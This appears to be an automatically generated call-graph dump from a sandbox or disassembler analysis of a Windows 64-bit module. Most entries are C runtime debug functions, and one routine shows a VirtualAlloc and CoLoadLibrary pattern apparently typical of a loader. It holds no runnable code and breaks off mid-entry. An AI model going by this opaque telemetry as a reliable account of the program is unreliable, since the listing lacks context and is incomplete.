16470->16471 16471->16468 16479 7ffa52463433 16480 7ffa52463446 16479->16480 16481 7ffa52463437 16479->16481 16482 7ffa52467d00 _ioterm DeleteCriticalSection 16481->16482 16483 7ffa5246343c 16482->16483 16484 7ffa52463e00 3 API calls 16483->16484 16485 7ffa52463441 16484->16485 16487 7ffa524688d0 HeapDestroy 16485->16487 16487->16480 17663 7ffa5247c435 17664 7ffa5247c479 _CrtMemDumpAllObjectsSince 17663->17664 17665 7ffa5247c598 DecodePointer 17664->17665 17666 7ffa5247c60d _CrtMemDumpAllObjectsSince 17665->17666 17667 7ffa5247c62b DecodePointer 17666->17667 17668 7ffa5247c652 _CrtMemDumpAllObjectsSince 17666->17668 17667->17668 17669 7ffa5247c676 DecodePointer 17668->17669 17678 7ffa5247c69d std::exception::_Copy_str 17668->17678 17669->17678 17670 7ffa5247cc93 17673 7ffa5246bd70 _invalid_parameter 17 API calls 17670->17673 17674 7ffa5247bb0e _LocaleUpdate::~_LocaleUpdate 17670->17674 17671 7ffa5247b99c 17671->17670 17675 7ffa5247bada 17671->17675 17672 7ffa5247b530 wctomb_s 19 API calls 17672->17678 17673->17674 17676 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17674->17676 17679 7ffa5246bd70 _invalid_parameter 17 API calls 17675->17679 17677 7ffa5247cd90 17676->17677 17678->17671 17678->17672 17679->17674 17680 7ffa52466c32 17681 7ffa52466c3c 17680->17681 17682 7ffa52466e25 _LocaleUpdate::~_LocaleUpdate 17681->17682 17684 7ffa52466c7a _CrtMemDumpAllObjectsSince 17681->17684 17683 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17682->17683 17685 7ffa52466e89 17683->17685 17686 7ffa5246c260 _CrtMemDumpAllObjectsSince_stat 3 API calls 17684->17686 17687 7ffa52466ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 17684->17687 17686->17687 17688 7ffa5246c0c0 _swprintf_p 17 API calls 17687->17688 17690 7ffa52466dc7 17688->17690 17689 7ffa52466e12 17690->17689 17691 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 17690->17691 17691->17689 18201 7ffa52474920 18204 7ffa5247d530 18201->18204 18207 7ffa5247d580 18204->18207 18208 7ffa5247d59a std::exception::_Tidy 18207->18208 18209 7ffa5247493d 18207->18209 18208->18209 18210 7ffa5247d660 std::exception::_Copy_str 17 API calls 18208->18210 18210->18209 16646 7ffa5246461b 16649 7ffa52464625 _calloc_dbg_impl 16646->16649 16648 7ffa524648be 16650 7ffa52469360 LeaveCriticalSection 16649->16650 16650->16648 16993 7ffa52469328 16994 7ffa52469336 EnterCriticalSection 16993->16994 16995 7ffa5246932c 16993->16995 16995->16994 17692 7ffa5247e424 17693 7ffa5247e469 _CrtMemDumpAllObjectsSince 17692->17693 17694 7ffa5247e588 DecodePointer 17693->17694 17695 7ffa5247e5fd _CrtMemDumpAllObjectsSince 17694->17695 17696 7ffa5247e642 _CrtMemDumpAllObjectsSince 17695->17696 17697 7ffa5247e61b DecodePointer 17695->17697 17698 7ffa5247e666 DecodePointer 17696->17698 17700 7ffa5247e68d std::exception::_Copy_str 17696->17700 17697->17696 17698->17700 17699 7ffa5247eadf 17702 7ffa5247ef10 25 API calls 17699->17702 17700->17699 17701 7ffa5247eec0 25 API calls 17700->17701 17710 7ffa5247da75 17700->17710 17701->17699 17703 7ffa5247eafd 17702->17703 17704 7ffa5247eb33 17703->17704 17707 7ffa5247eec0 25 API calls 17703->17707 17705 7ffa5247ec29 17704->17705 17719 7ffa5247eb49 _CrtMemDumpAllObjectsSince 17704->17719 17708 7ffa5247ebda 17705->17708 17709 7ffa5247ef10 25 API calls 17705->17709 17706 7ffa5247eca1 17712 7ffa5246bd70 _invalid_parameter 17 API calls 17706->17712 17714 7ffa5247dbe9 _LocaleUpdate::~_LocaleUpdate 17706->17714 17707->17704 17708->17710 17711 7ffa5247eec0 25 API calls 17708->17711 17709->17708 17710->17706 17713 7ffa5247dbb5 17710->17713 17711->17710 17712->17714 17717 7ffa5246bd70 _invalid_parameter 17 API calls 17713->17717 17715 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17714->17715 17716 7ffa5247ed9e 17715->17716 17717->17714 17718 7ffa5247f000 wcsxfrm 2 API calls 17718->17719 17719->17708 17719->17718 17720 7ffa5247ee40 25 API calls 17719->17720 17720->17719 18646 7ffa52465a25 18647 7ffa52465a37 18646->18647 18648 7ffa5246bd70 _invalid_parameter 17 API calls 18647->18648 18649 7ffa52465aaf 18648->18649 17725 7ffa524633d6 17728 7ffa524688d0 HeapDestroy 17725->17728 17727 7ffa524633db 17728->17727 16996 7ffa52465ad9 16997 7ffa52465add 16996->16997 17002 7ffa52466380 16997->17002 16999 7ffa52465b3a 17006 7ffa52469360 LeaveCriticalSection 16999->17006 17001 7ffa52465c14 17003 7ffa52466395 _CrtIsValidPointer 17002->17003 17005 7ffa52466391 17002->17005 17004 7ffa524663b6 HeapValidate 17003->17004 17003->17005 17004->17005 17005->16999 17006->17001 18215 7ffa524634d5 18216 7ffa524634da _calloc_dbg 18215->18216 18217 7ffa5246350b FlsSetValue 18216->18217 18221 7ffa52463548 18216->18221 18218 7ffa52463520 18217->18218 18217->18221 18219 7ffa52463e30 LeaveCriticalSection 18218->18219 18220 7ffa5246352c GetCurrentThreadId 18219->18220 18220->18221 17018 7ffa524776c0 17019 7ffa524776cf _CrtMemDumpAllObjectsSince 17018->17019 17020 7ffa52477be3 _CrtMemDumpAllObjectsSince 17018->17020 17022 7ffa52477905 _CrtMemDumpAllObjectsSince 17019->17022 17023 7ffa524777f5 _CrtMemDumpAllObjectsSince wcsncnt 17019->17023 17032 7ffa524776e6 _LocaleUpdate::~_LocaleUpdate 17019->17032 17021 7ffa52477cc6 WideCharToMultiByte 17020->17021 17020->17032 17021->17032 17025 7ffa5247790f WideCharToMultiByte 17022->17025 17028 7ffa52477827 WideCharToMultiByte 17023->17028 17024 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17026 7ffa52477d85 17024->17026 17027 7ffa52477965 17025->17027 17029 7ffa5247799a GetLastError 17027->17029 17027->17032 17028->17032 17031 7ffa524779d3 _CrtMemDumpAllObjectsSince 17029->17031 17029->17032 17030 7ffa52477a05 WideCharToMultiByte 17030->17031 17030->17032 17031->17030 17031->17032 17032->17024 18222 7ffa5247bcbd 18224 7ffa5247b99c 18222->18224 18223 7ffa5247cc93 18225 7ffa5246bd70 _invalid_parameter 17 API calls 18223->18225 18226 7ffa5247bb0e _LocaleUpdate::~_LocaleUpdate 18223->18226 18224->18223 18227 7ffa5247bada 18224->18227 18225->18226 18228 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18226->18228 18230 7ffa5246bd70 _invalid_parameter 17 API calls 18227->18230 18229 7ffa5247cd90 18228->18229 18230->18226 17737 7ffa52479fba 17747 7ffa52479c4d 17737->17747 17738 7ffa5247a06d WriteFile 17739 7ffa5247a103 GetLastError 17738->17739 17738->17747 17744 7ffa52479dd9 _dosmaperr __doserrno 17739->17744 17740 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17741 7ffa5247a9f5 17740->17741 17742 7ffa52479f66 WideCharToMultiByte 17743 7ffa52479fbf WriteFile 17742->17743 17742->17744 17746 7ffa5247a050 GetLastError 17743->17746 17743->17747 17744->17740 17745 7ffa5247fc00 WriteConsoleW CreateFileW _putwch_nolock 17745->17747 17746->17744 17747->17738 17747->17742 17747->17744 17747->17745 17748 7ffa5247a158 GetLastError 17747->17748 17749 7ffa5247f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 17747->17749 17750 7ffa5247a1b5 GetLastError 17747->17750 17748->17744 17749->17747 17750->17744 18231 7ffa524668c4 18232 7ffa524668d1 18231->18232 18233 7ffa52466ba6 18232->18233 18236 7ffa524668ed _CrtIsValidPointer 18232->18236 18249 7ffa52469360 LeaveCriticalSection 18233->18249 18235 7ffa52466bb0 18237 7ffa5246695e IsBadReadPtr 18236->18237 18238 7ffa52466976 18236->18238 18247 7ffa5246692f 18236->18247 18237->18238 18239 7ffa52466ad2 18238->18239 18240 7ffa52466a29 18238->18240 18241 7ffa52466b2d 18239->18241 18242 7ffa52466add 18239->18242 18243 7ffa52466abe 18240->18243 18244 7ffa52466a86 IsBadReadPtr 18240->18244 18241->18247 18248 7ffa52466bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18241->18248 18246 7ffa52466bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18242->18246 18245 7ffa52466bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18243->18245 18244->18243 18244->18247 18245->18247 18246->18247 18248->18247 18249->18235 17751 7ffa5246f7f1 17752 7ffa5246f80d 17751->17752 17769 7ffa5246f8de _wcsftime_l 17751->17769 17808 7ffa52476fb0 17752->17808 17755 7ffa5246fa70 17815 7ffa524769c0 17755->17815 17756 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17759 7ffa5246f85a OutputDebugStringA 17756->17759 17758 7ffa5246f9f4 17758->17755 17761 7ffa5246d490 std::exception::_Copy_str 17 API calls 17758->17761 17762 7ffa5246f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 17759->17762 17760 7ffa5246fa8a 17763 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17760->17763 17764 7ffa5246fa43 17761->17764 17807 7ffa5246f8ce 17762->17807 17766 7ffa5246fab7 17763->17766 17767 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17764->17767 17768 7ffa5246fb24 17766->17768 17770 7ffa524769c0 17 API calls 17766->17770 17783 7ffa5246fb6a 17766->17783 17767->17755 17771 7ffa524769c0 17 API calls 17768->17771 17769->17758 17776 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 17769->17776 17777 7ffa5246f996 17769->17777 17773 7ffa5246faf7 17770->17773 17772 7ffa5246fb3d 17771->17772 17774 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17772->17774 17778 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17773->17778 17774->17783 17775 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17779 7ffa5247011d 17775->17779 17776->17777 17777->17758 17780 7ffa5246d490 std::exception::_Copy_str 17 API calls 17777->17780 17778->17768 17781 7ffa5246f9c7 17780->17781 17782 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17781->17782 17782->17758 17784 7ffa5246fc39 17783->17784 17786 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 17783->17786 17785 7ffa5246fc97 17784->17785 17787 7ffa5246d490 std::exception::_Copy_str 17 API calls 17784->17787 17828 7ffa52476970 17785->17828 17786->17784 17788 7ffa5246fc6a 17787->17788 17790 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17788->17790 17790->17785 17792 7ffa52466ea0 _invoke_watson_if_oneof 16 API calls 17793 7ffa5246fd6e 17792->17793 17794 7ffa52471640 17 API calls 17793->17794 17803 7ffa5246fdbb 17793->17803 17795 7ffa5246fd8e 17794->17795 17796 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17795->17796 17796->17803 17797 7ffa5246ffef 17798 7ffa52470008 OutputDebugStringA 17797->17798 17799 7ffa52470016 17797->17799 17798->17799 17804 7ffa52476fb0 _itow_s 17 API calls 17799->17804 17799->17807 17801 7ffa5246ff03 std::exception::_Copy_str 17801->17797 17802 7ffa5246ffaa WriteFile 17801->17802 17801->17807 17802->17797 17803->17801 17831 7ffa52469360 LeaveCriticalSection 17803->17831 17805 7ffa52470065 17804->17805 17806 7ffa52467ff0 _invoke_watson_if_error 16 API calls 17805->17806 17806->17807 17807->17775 17809 7ffa52476fd6 17808->17809 17810 7ffa52477003 17808->17810 17809->17810 17811 7ffa52476fdd 17809->17811 17812 7ffa52477030 _itow_s 17 API calls 17810->17812 17832 7ffa52477030 17811->17832 17814 7ffa5246f82d 17812->17814 17814->17756 17817 7ffa524769e1 17815->17817 17816 7ffa52476a42 17818 7ffa5246bd70 _invalid_parameter 17 API calls 17816->17818 17817->17816 17819 7ffa52476a80 _calloc_dbg_impl 17817->17819 17823 7ffa52476a76 _calloc_dbg_impl 17818->17823 17820 7ffa52476b6e 17819->17820 17821 7ffa52476bac _calloc_dbg_impl 17819->17821 17824 7ffa5246bd70 _invalid_parameter 17 API calls 17820->17824 17822 7ffa52476ce8 17821->17822 17825 7ffa52476d26 _calloc_dbg_impl 17821->17825 17826 7ffa5246bd70 _invalid_parameter 17 API calls 17822->17826 17823->17760 17824->17823 17825->17823 17827 7ffa5246bd70 _invalid_parameter 17 API calls 17825->17827 17826->17823 17827->17823 17848 7ffa524763e0 17828->17848 17830 7ffa5246fd20 17830->17792 17831->17801 17833 7ffa52477055 17832->17833 17834 7ffa524770ab 17833->17834 17837 7ffa524770e9 17833->17837 17835 7ffa5246bd70 _invalid_parameter 17 API calls 17834->17835 17845 7ffa524770df 17835->17845 17836 7ffa5247714a 17838 7ffa5246bd70 _invalid_parameter 17 API calls 17836->17838 17837->17836 17840 7ffa52477188 _calloc_dbg_impl 17837->17840 17838->17845 17839 7ffa52477287 17841 7ffa5246bd70 _invalid_parameter 17 API calls 17839->17841 17840->17839 17842 7ffa524772c5 17840->17842 17841->17845 17843 7ffa52477338 17842->17843 17846 7ffa52477376 17842->17846 17844 7ffa5246bd70 _invalid_parameter 17 API calls 17843->17844 17844->17845 17845->17814 17846->17845 17847 7ffa5246bd70 _invalid_parameter 17 API calls 17846->17847 17847->17845 17850 7ffa5247640e 17848->17850 17849 7ffa5247648e 17851 7ffa5246bd70 _invalid_parameter 17 API calls 17849->17851 17850->17849 17852 7ffa524764cc _calloc_dbg_impl 17850->17852 17859 7ffa524764c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17851->17859 17853 7ffa5247668e _CrtMemDumpAllObjectsSince 17852->17853 17854 7ffa5247663f 17852->17854 17860 7ffa52475ea0 17853->17860 17856 7ffa5246bd70 _invalid_parameter 17 API calls 17854->17856 17856->17859 17857 7ffa524766b5 _calloc_dbg_impl 17858 7ffa5246bd70 _invalid_parameter 17 API calls 17857->17858 17857->17859 17858->17859 17859->17830 17861 7ffa52475ecf 17860->17861 17862 7ffa52475fae 17861->17862 17863 7ffa52475f6e 17861->17863 17872 7ffa52475eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 17861->17872 17865 7ffa524762e1 _CrtMemDumpAllObjectsSince 17862->17865 17866 7ffa52475fcf _CrtMemDumpAllObjectsSince 17862->17866 17864 7ffa5246bd70 _invalid_parameter 17 API calls 17863->17864 17864->17872 17867 7ffa5247632f MultiByteToWideChar 17865->17867 17865->17872 17868 7ffa524760a1 MultiByteToWideChar 17866->17868 17866->17872 17867->17872 17869 7ffa5247610e GetLastError 17868->17869 17868->17872 17870 7ffa52476154 _CrtMemDumpAllObjectsSince wcsxfrm 17869->17870 17869->17872 17871 7ffa52476238 MultiByteToWideChar 17870->17871 17870->17872 17871->17872 17872->17857 18254 7ffa524664eb 18255 7ffa524664f8 18254->18255 18258 7ffa52466504 18255->18258 18259 7ffa52469360 LeaveCriticalSection 18255->18259 18257 7ffa52466655 18259->18257 17075 7ffa52479aeb 17076 7ffa52479b2c 17075->17076 17077 7ffa52479b18 17075->17077 17079 7ffa5247ab10 17 API calls 17076->17079 17078 7ffa52479520 19 API calls 17077->17078 17078->17076 17082 7ffa52479b38 17079->17082 17080 7ffa52479c04 17081 7ffa5247a1cb 17080->17081 17085 7ffa52479c23 GetConsoleCP 17080->17085 17083 7ffa5247a8ad WriteFile 17081->17083 17084 7ffa5247a205 17081->17084 17082->17080 17089 7ffa52479bae GetConsoleMode 17082->17089 17087 7ffa5247a923 GetLastError 17083->17087 17091 7ffa52479dd9 _dosmaperr __doserrno 17083->17091 17086 7ffa5247a400 17084->17086 17090 7ffa5247a21a 17084->17090 17093 7ffa52479c4d 17085->17093 17088 7ffa5247a5f3 17086->17088 17105 7ffa5247a40e 17086->17105 17087->17091 17088->17091 17099 7ffa5247a726 WideCharToMultiByte 17088->17099 17103 7ffa5247a7b0 WriteFile 17088->17103 17089->17080 17090->17091 17094 7ffa5247a33e WriteFile 17090->17094 17092 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17091->17092 17096 7ffa5247a9f5 17092->17096 17093->17091 17098 7ffa52479f66 WideCharToMultiByte 17093->17098 17104 7ffa5247fc00 WriteConsoleW CreateFileW _putwch_nolock 17093->17104 17108 7ffa5247a158 GetLastError 17093->17108 17109 7ffa5247f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 17093->17109 17110 7ffa5247a06d WriteFile 17093->17110 17112 7ffa5247a1b5 GetLastError 17093->17112 17094->17090 17095 7ffa5247a3ea GetLastError 17094->17095 17095->17091 17097 7ffa5247a531 WriteFile 17100 7ffa5247a5dd GetLastError 17097->17100 17097->17105 17098->17091 17101 7ffa52479fbf WriteFile 17098->17101 17099->17088 17102 7ffa5247a791 GetLastError 17099->17102 17100->17091 17101->17093 17106 7ffa5247a050 GetLastError 17101->17106 17102->17091 17103->17088 17107 7ffa5247a857 GetLastError 17103->17107 17104->17093 17105->17091 17105->17097 17106->17091 17107->17088 17108->17091 17109->17093 17110->17093 17111 7ffa5247a103 GetLastError 17110->17111 17111->17091 17112->17091 18260 7ffa5246d0ea 18261 7ffa5246d0ef 18260->18261 18262 7ffa52467090 _exit 33 API calls 18261->18262 18263 7ffa5246d209 18261->18263 18267 7ffa5246d0fc 18261->18267 18262->18263 18265 7ffa5246d289 18263->18265 18268 7ffa52463d00 RtlEncodePointer 18263->18268 18265->18267 18269 7ffa52469360 LeaveCriticalSection 18265->18269 18268->18265 18269->18267 18650 7ffa524691ea 18651 7ffa524691ef 18650->18651 18652 7ffa524674e0 __crtExitProcess 3 API calls 18651->18652 18653 7ffa52469203 18652->18653 16488 7ffa52466ff2 16489 7ffa52466ffe 16488->16489 16492 7ffa5246ca00 16489->16492 16491 7ffa52467011 _initterm_e 16493 7ffa5246ca0e 16492->16493 16494 7ffa5246ca4b 16493->16494 16495 7ffa5246ca23 EncodePointer 16493->16495 16494->16491 16495->16493 18270 7ffa524748e0 18271 7ffa524748f7 std::bad_exception::~bad_exception 18270->18271 18272 7ffa5247490c 18271->18272 18273 7ffa5247d710 _Ref_count LeaveCriticalSection 18271->18273 18273->18272 18658 7ffa52475de0 18659 7ffa52463170 __GSHandlerCheck 8 API calls 18658->18659 18660 7ffa52475e34 18659->18660 18661 7ffa52475e86 18660->18661 18663 7ffa52463870 18660->18663 18664 7ffa524639db __SehTransFilter 18663->18664 18665 7ffa524638de __SehTransFilter 18663->18665 18664->18661 18665->18664 18666 7ffa52463a71 RtlUnwindEx 18665->18666 18666->18664 17873 7ffa524813e0 17876 7ffa5247aee0 17873->17876 17877 7ffa5247af47 LeaveCriticalSection 17876->17877 17878 7ffa5247aef7 17876->17878 17881 7ffa5247af45 17877->17881 17878->17877 17879 7ffa5247af0b 17878->17879 17882 7ffa52469360 LeaveCriticalSection 17879->17882 17882->17881 18274 7ffa524714e1 18275 7ffa52471520 DecodePointer 18274->18275 18276 7ffa524714ef DecodePointer 18274->18276 18277 7ffa52471540 18275->18277 18276->18275 18279 7ffa5247150f 18276->18279 18278 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18277->18278 18280 7ffa5247157a 18278->18280 18279->18275 18667 7ffa5247ade0 18672 7ffa5247fee0 18667->18672 18671 7ffa5247adf9 18673 7ffa5247ff00 _fflush_nolock 25 API calls 18672->18673 18674 7ffa5247ade9 18673->18674 18674->18671 18675 7ffa5247fc70 18674->18675 18681 7ffa5247fc86 18675->18681 18676 7ffa5247fd59 18693 7ffa52469360 LeaveCriticalSection 18676->18693 18678 7ffa5247fd63 18678->18671 18679 7ffa5247fd09 DeleteCriticalSection 18679->18681 18681->18676 18681->18679 18682 7ffa52480580 18681->18682 18683 7ffa52480599 18682->18683 18684 7ffa524805ef 18683->18684 18685 7ffa5248062a 18683->18685 18687 7ffa5246bd70 _invalid_parameter 17 API calls 18684->18687 18689 7ffa52480623 18685->18689 18694 7ffa5247ae10 18685->18694 18687->18689 18688 7ffa52480651 18698 7ffa52480680 18688->18698 18689->18681 18691 7ffa5248065c 18692 7ffa5247aee0 2 API calls 18691->18692 18692->18689 18693->18678 18695 7ffa5247ae77 EnterCriticalSection 18694->18695 18696 7ffa5247ae27 18694->18696 18697 7ffa5247ae3b 18695->18697 18696->18695 18696->18697 18697->18688 18699 7ffa52480699 18698->18699 18700 7ffa524806ef 18699->18700 18701 7ffa5248072d 18699->18701 18705 7ffa5246bd70 _invalid_parameter 17 API calls 18700->18705 18702 7ffa52480723 18701->18702 18703 7ffa5247fdf0 _fflush_nolock 17 API calls 18701->18703 18702->18691 18704 7ffa52480752 18703->18704 18706 7ffa5247afb0 _fflush_nolock 17 API calls 18704->18706 18705->18702 18707 7ffa5248076a 18706->18707 18709 7ffa52480a20 18707->18709 18710 7ffa52480a33 __doserrno 18709->18710 18711 7ffa52480a53 18709->18711 18710->18702 18712 7ffa52480abc __doserrno 18711->18712 18718 7ffa52480b05 18711->18718 18715 7ffa5246bd70 _invalid_parameter 17 API calls 18712->18715 18713 7ffa52480b89 __doserrno 18721 7ffa5246bd70 _invalid_parameter 17 API calls 18713->18721 18714 7ffa52480bd2 18716 7ffa5247fae0 _fflush_nolock 3 API calls 18714->18716 18715->18710 18717 7ffa52480bdb 18716->18717 18720 7ffa52480c13 18717->18720 18723 7ffa52480c80 18717->18723 18718->18713 18718->18714 18736 7ffa5247fbc0 LeaveCriticalSection 18720->18736 18721->18710 18724 7ffa5247f900 _fflush_nolock 17 API calls 18723->18724 18726 7ffa52480c91 18724->18726 18725 7ffa52480d05 18737 7ffa5247f7d0 18725->18737 18726->18725 18728 7ffa5247f900 _fflush_nolock 17 API calls 18726->18728 18735 7ffa52480ce5 18726->18735 18730 7ffa52480cd6 18728->18730 18729 7ffa5247f900 _fflush_nolock 17 API calls 18731 7ffa52480cf8 CloseHandle 18729->18731 18732 7ffa5247f900 _fflush_nolock 17 API calls 18730->18732 18731->18725 18733 7ffa52480d0f GetLastError 18731->18733 18732->18735 18733->18725 18734 7ffa52480d22 _dosmaperr 18734->18720 18735->18725 18735->18729 18736->18710 18738 7ffa5247f7e3 18737->18738 18739 7ffa5247f878 __doserrno 18737->18739 18738->18739 18740 7ffa5247f87a SetStdHandle 18738->18740 18741 7ffa5247f86a 18738->18741 18739->18734 18740->18739 18742 7ffa5247f871 18741->18742 18743 7ffa5247f889 SetStdHandle 18741->18743 18742->18739 18744 7ffa5247f898 SetStdHandle 18742->18744 18743->18739 18744->18739 16536 7ffa524635e1 16538 7ffa524635f1 16536->16538 16541 7ffa524635ea 16536->16541 16538->16541 16542 7ffa524612b0 16538->16542 16540 7ffa524612b0 14 API calls 16540->16541 16543 7ffa524612de CoLoadLibrary 16542->16543 16548 7ffa52462f8c 16542->16548 16545 7ffa52462f0f MessageBoxA ExitProcess 16543->16545 16546 7ffa52462f2e VirtualAlloc RtlAllocateHeap 16543->16546 16544 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16547 7ffa524630ff 16544->16547 16546->16548 16549 7ffa52462f73 _calloc_dbg_impl 16546->16549 16547->16540 16547->16541 16548->16544 16550 7ffa52462f83 RtlDeleteBoundaryDescriptor 16549->16550 16550->16548 17886 7ffa52463fe1 17887 7ffa52463fea SetLastError 17886->17887 16625 7ffa52467de0 16626 7ffa52467ded 16625->16626 16628 7ffa52467df2 std::exception::_Copy_str _calloc_dbg 16625->16628 16627 7ffa5246aa40 __initmbctable 24 API calls 16626->16627 16627->16628 16629 7ffa52467e0e 16628->16629 16632 7ffa5246d490 16628->16632 16642 7ffa52467ff0 16628->16642 16634 7ffa5246d4b1 16632->16634 16633 7ffa5246d512 16635 7ffa5246bd70 _invalid_parameter 17 API calls 16633->16635 16634->16633 16638 7ffa5246d550 _calloc_dbg_impl 16634->16638 16636 7ffa5246d546 _calloc_dbg_impl 16635->16636 16636->16628 16637 7ffa5246d67c _calloc_dbg_impl 16637->16636 16641 7ffa5246bd70 _invalid_parameter 17 API calls 16637->16641 16638->16637 16639 7ffa5246d63e 16638->16639 16640 7ffa5246bd70 _invalid_parameter 17 API calls 16639->16640 16640->16636 16641->16636 16643 7ffa5246800e 16642->16643 16644 7ffa52468010 16642->16644 16643->16628 16645 7ffa5246be00 _invoke_watson_if_oneof 16 API calls 16644->16645 16645->16643 17888 7ffa5247bfde 17889 7ffa5247c00c 17888->17889 17890 7ffa5247b99c 17889->17890 17892 7ffa5247b530 wctomb_s 19 API calls 17889->17892 17891 7ffa5247cc93 17890->17891 17895 7ffa5247bada 17890->17895 17893 7ffa5246bd70 _invalid_parameter 17 API calls 17891->17893 17894 7ffa5247bb0e _LocaleUpdate::~_LocaleUpdate 17891->17894 17892->17889 17893->17894 17896 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17894->17896 17898 7ffa5246bd70 _invalid_parameter 17 API calls 17895->17898 17897 7ffa5247cd90 17896->17897 17898->17894 17174 7ffa524666da 17175 7ffa52466745 17174->17175 17176 7ffa52466725 17174->17176 17177 7ffa5246677f 17175->17177 17179 7ffa52469b10 __updatetmbcinfo LeaveCriticalSection 17175->17179 17176->17175 17180 7ffa52469a70 17176->17180 17179->17177 17181 7ffa52469a79 _updatetlocinfoEx_nolock 17180->17181 17182 7ffa52469ad8 17181->17182 17184 7ffa52469360 LeaveCriticalSection 17181->17184 17182->17175 17184->17182 17899 7ffa5246c7e9 17900 7ffa5246c90c EncodePointer EncodePointer 17899->17900 17901 7ffa5246c80d 17899->17901 17903 7ffa5246c8ca 17900->17903 17902 7ffa5246c872 17901->17902 17908 7ffa52464a00 17901->17908 17902->17903 17905 7ffa52464a00 _realloc_dbg 30 API calls 17902->17905 17907 7ffa5246c8ce EncodePointer 17902->17907 17906 7ffa5246c8bd 17905->17906 17906->17903 17906->17907 17907->17900 17909 7ffa52464a22 17908->17909 17914 7ffa52464a70 17909->17914 17911 7ffa52464a4c 17925 7ffa52469360 LeaveCriticalSection 17911->17925 17913 7ffa52464a5b 17913->17902 17915 7ffa52464aae _calloc_dbg_impl 17914->17915 17917 7ffa52464ad4 _realloc_dbg 17914->17917 17915->17911 17916 7ffa52466380 _CrtIsValidHeapPointer HeapValidate 17918 7ffa52464e2c 17916->17918 17917->17915 17917->17916 17918->17915 17919 7ffa52464f90 17918->17919 17920 7ffa52464f64 17918->17920 17941 7ffa5246ba60 17919->17941 17926 7ffa5246bc30 17920->17926 17923 7ffa52464fa6 17923->17915 17924 7ffa52464fba HeapSize 17923->17924 17924->17915 17925->17913 17927 7ffa5246bc50 17926->17927 17928 7ffa5246bc5f 17926->17928 17952 7ffa5246abf0 17927->17952 17929 7ffa5246bc67 17928->17929 17935 7ffa5246bc78 17928->17935 17931 7ffa5246c020 _free_base 2 API calls 17929->17931 17938 7ffa5246bc5a _get_errno_from_oserr 17931->17938 17932 7ffa5246bcba 17934 7ffa5246abb0 _callnewh DecodePointer 17932->17934 17933 7ffa5246bc9a HeapReAlloc 17933->17935 17934->17938 17935->17932 17935->17933 17936 7ffa5246bce4 17935->17936 17939 7ffa5246abb0 _callnewh DecodePointer 17935->17939 17940 7ffa5246bd1f GetLastError 17935->17940 17937 7ffa5246bcee GetLastError 17936->17937 17936->17938 17937->17938 17938->17915 17939->17935 17940->17938 17942 7ffa5246ba76 17941->17942 17943 7ffa5246bacc 17942->17943 17944 7ffa5246bb07 17942->17944 17947 7ffa5246bd70 _invalid_parameter 17 API calls 17943->17947 17945 7ffa5246bb32 HeapSize HeapReAlloc 17944->17945 17949 7ffa5246bb00 _get_errno_from_oserr 17944->17949 17946 7ffa5246bb74 17945->17946 17945->17949 17948 7ffa5246bba0 GetLastError 17946->17948 17958 7ffa5246bbd0 HeapQueryInformation 17946->17958 17947->17949 17948->17949 17949->17923 17953 7ffa5246ac4d 17952->17953 17955 7ffa5246ac0a 17952->17955 17954 7ffa5246abb0 _callnewh DecodePointer 17953->17954 17956 7ffa5246ac21 17954->17956 17955->17956 17957 7ffa5246abb0 _callnewh DecodePointer 17955->17957 17956->17938 17957->17955 17959 7ffa5246bb90 17958->17959 17959->17948 17959->17949 17960 7ffa5246a7e9 17961 7ffa5246a7f9 17960->17961 17962 7ffa5246a80a 17961->17962 17963 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17961->17963 17964 7ffa5246aa30 17963->17964 18285 7ffa524670e6 18286 7ffa52467090 _exit 33 API calls 18285->18286 18287 7ffa524670f0 18286->18287 18763 7ffa524775e9 18764 7ffa524775f4 18763->18764 18767 7ffa524775fb 18763->18767 18765 7ffa52463280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18764->18765 18766 7ffa52477d85 18765->18766 18768 7ffa5246bd70 _invalid_parameter 17 API calls 18767->18768 18768->18764 17185 7ffa52467ae3 17188 7ffa52467af3 17185->17188 17186 7ffa52467ce0 SetHandleCount 17187 7ffa52467c74 17186->17187 17188->17186 17189 7ffa52467b95 GetStdHandle 17188->17189 17191 7ffa52467c7b 17188->17191 17190 7ffa52467bb9 17189->17190 17189->17191 17190->17191 17192 7ffa52467bc8 GetFileType 17190->17192 17191->17186 17192->17191 17193 7ffa52467beb InitializeCriticalSectionAndSpinCount 17192->17193 17193->17187 17193->17191 18288 7ffa524744e5 18293 7ffa5247445a __SehTransFilter 18288->18293 18289 7ffa524747d7 18290 7ffa5247485b 18289->18290 18291 7ffa5246cf80 _inconsistency 36 API calls 18289->18291 18291->18290 18292 7ffa5247466c __SehTransFilter 18292->18289 18294 7ffa52475bb0 __SehTransFilter 36 API calls 